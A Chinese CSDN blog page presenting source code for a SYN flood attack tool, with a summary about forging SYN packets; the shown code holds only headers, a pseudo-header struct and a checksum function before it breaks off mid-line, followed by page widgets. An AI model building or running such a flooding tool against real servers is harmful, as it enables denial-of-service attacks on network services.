SYN Flood 工具源码

本文通过分析SYN Flood攻击工具的源码,深入解析TCP/IP协议栈中的SYN过程,介绍如何构造伪造的SYN包,并探讨其对网络服务的影响。通过示例代码,展示了如何创建和发送带有SYN标志的TCP报文。
摘要由CSDN通过智能技术生成

#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netinet/ip_icmp.h>
#include <ctype.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>

u_int16_t  srcport;

struct pseudohdr
{
 struct in_addr saddr;
 struct in_addr daddr;
 u_char zero;
 u_char protocol;
 u_short length;
 struct tcphdr tcpheader;
 
};


u_short checksum(u_short * data,u_short length)
{
 int nleft = length;
 int sum=0;
 unsigned short *w = data;
 unsigned short value = 0;
while (nleft

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值